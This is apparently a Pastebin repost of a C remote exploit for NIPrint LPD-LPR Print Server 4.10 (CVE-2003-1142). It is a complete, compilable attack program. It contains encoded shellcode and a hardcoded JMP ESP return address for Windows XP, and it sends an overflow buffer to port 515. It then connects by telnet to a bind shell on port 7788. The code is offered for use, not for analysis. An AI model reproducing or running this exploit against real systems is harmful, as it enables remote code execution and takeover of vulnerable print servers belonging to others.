API tools faq
paste
Advertisement
FlyFar

NIPrint LPD-LPR Print Server 4.10 - Remote Overflow - CVE-2003-1142

FlyFar
Feb 17th, 2024
901
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 5.97 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2. \   remote exploit for NIPrint LPD-LPR Print Server (Version <= 4.10)
  3. /
  4. \   by xCrZx /BLack Sand Project/ /04.11.03/
  5. /
  6. \   bug found by KF
  7. /   successfully tested on Win XP 5.1.2600
  8. /   P.S.#1 coded just for fun...
  9. \   P.S.#2 this exploit can be compiled under Win32 and *nix
  10. */
  11.  
  12.  
  13. #ifdef _WIN32
  14.  
  15.  #include <winsock.h>
  16.  #include <windows.h>
  17.  
  18. #else
  19.  
  20.  #include <netinet/in.h>  
  21.  #include <netdb.h>
  22.  #include <sys/types.h>
  23.  #include <sys/socket.h>
  24.  #include <sys/stat.h>
  25.  #include <fcntl.h>
  26.  #include <unistd.h>
  27.  #include <errno.h>
  28.  
  29. #endif
  30.  
  31. #include <stdio.h>
  32.  
  33. // JMP ESP ADDRESS (in Win XP 5.1.2600)
  34. #define RET 0x77F5801c
  35. #define SHELL 7788
  36.  
  37. char shellcode[] =
  38.  
  39.         "\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
  40.         "\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
  41.         "\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
  42.         "\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
  43.         "\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
  44.         "\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
  45.         "\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
  46.         "\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
  47.         "\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
  48.         "\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
  49.         "\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
  50.         "\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
  51.         "\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
  52.         "\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
  53.         "\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
  54.         "\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
  55.         "\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
  56.         "\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
  57.         "\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
  58.         "\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
  59.         "\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
  60.         "\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
  61.         "\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
  62.         "\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
  63.         "\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
  64.         "\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
  65.         "\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
  66.         "\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
  67.         "\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
  68.         "\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
  69.         "\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
  70.         "\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
  71.         "\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xc0\xa4\x5e\xc6\xc7"
  72.         "\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
  73.         "\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
  74.         "\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
  75.         "\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0"
  76.         "\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
  77.         "\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
  78.         "\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"
  79.         "\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
  80.         "\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
  81.         "\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
  82.         "\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
  83.         "\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
  84.         "\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
  85.         "\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
  86.         "\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
  87.         "\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
  88.         "\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97"
  89.         "\x68\x68\x68\x68";
  90.  
  91.  
  92. long getip(char *hostname) {
  93.     struct hostent *he;
  94.     long ipaddr;
  95.    
  96.     if ((ipaddr = inet_addr(hostname)) < 0) {
  97.         if ((he = gethostbyname(hostname)) == NULL) {
  98.             perror("gethostbyname()");
  99.             exit(-1);
  100.         }
  101.         memcpy(&ipaddr, he->h_addr, he->h_length);
  102.     }  
  103.     return ipaddr;
  104. }
  105.  
  106. int main(int argc, char **argv) {
  107.  
  108. #ifdef _WIN32
  109.     WSADATA wsaData;
  110. #endif
  111.  
  112.     int sock;
  113.     struct sockaddr_in sockstruct;
  114.     char tmp[2000];
  115.  
  116.  
  117.     if(!argv[1]) { printf("Usage: %s <address>\n",argv[0]);exit(0); }
  118.  
  119. #ifdef _WIN32
  120.  
  121.     if(WSAStartup(0x101,&wsaData)){
  122.         printf("Unable to initialize WinSock lib.\n");
  123.         exit(0);
  124.     }
  125.  
  126. #endif
  127.  
  128.     memset(sockstruct.sin_zero,0x00,sizeof(sockstruct.sin_zero));
  129.     sock=socket(PF_INET,SOCK_STREAM,0);
  130.     sockstruct.sin_family=PF_INET;
  131.         sockstruct.sin_addr.s_addr=getip(argv[1]);
  132.         sockstruct.sin_port=htons(515);
  133.  
  134.     if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
  135.  
  136.         printf("[+] Connected to %s:515!\n",argv[1]);
  137.  
  138.         memset(tmp,0x00,sizeof tmp);
  139.         memset(tmp,0x41,49);
  140.         *(long *)&tmp[strlen(tmp)]=RET;
  141.         memset(tmp+strlen(tmp),0x90,50);
  142.         memcpy(tmp+strlen(tmp),&shellcode,strlen(shellcode));
  143.         send(sock,tmp,strlen(tmp),0);
  144.         printf("[+] Exploit code was sent!\n");
  145.     }
  146.  
  147. #ifdef _WIN32
  148.     closesocket(sock);
  149.     WSACleanup();
  150. #else
  151.     close(sock);
  152. #endif
  153.  
  154.     printf("[+] Connecting to %s:%d\n",argv[1],SHELL);
  155.     sprintf(tmp,"telnet %s %d\n",argv[1],SHELL);
  156.     system(tmp);
  157.     printf("[-] Not connected! NIPrint probably not vulnerable!\n");
  158.  
  159.     return 0;
  160. }
  161.  
  162. // milw0rm.com [2003-11-04]
  163.            
Tags: Server Exploit bug CVE Vulnerability print remote Overflow
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!